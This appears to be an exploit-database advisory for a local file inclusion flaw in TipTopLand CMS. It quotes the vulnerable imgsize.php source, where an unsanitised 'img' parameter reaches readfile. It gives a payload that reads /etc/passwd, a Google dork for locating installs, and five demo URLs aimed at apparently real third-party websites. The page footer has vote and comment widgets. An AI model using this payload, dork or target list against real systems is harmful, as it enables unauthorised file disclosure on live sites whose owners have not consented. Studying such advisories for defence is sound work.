TipTopLand CMS - Local File Inclusion Vulnerability

2020.05.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

####################################################### # Exploit Title : TipTopLand CMS - Local File Inclusion Vulnerability # Date : 2020-05-08 # Exploit Author : Freedom Fighter # Vendor Homepage : tiptopland.com # Google Dork : intext:"TipTopLand Design Studio" # category : Webapps # Tested on : Google Chrome Browser ####################################################### -- Vulnerable Page: /imgsize.php -- Vulnerable Source: 28: $img = $_GET['img']; 74: $im = @ImageCreateFromJPEG ($img) or // Read JPEG Image 75: $im = @ImageCreateFromPNG ($img) or // or PNG Image 76: $im = @ImageCreateFromGIF ($img) or // or GIF Image 77: $im = false; // If image is not JPEG, PNG, or GIF 79: if (!$im) { 82: readfile ($img); -- Payload: view-source:target/imgsize.php?img=[file]&w=0 -- DEMO: view-source:http://pardisyazd.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.behsarma.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.nsmdrywall.com/imgsize.php?img=/etc/passwd&w=0 view-source:http://vistapanel.ir/imgsize.php?img=/etc/passwd&w=0 view-source:http://www.mafaco.ir/imgsize.php?img=/etc/passwd&w=0


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top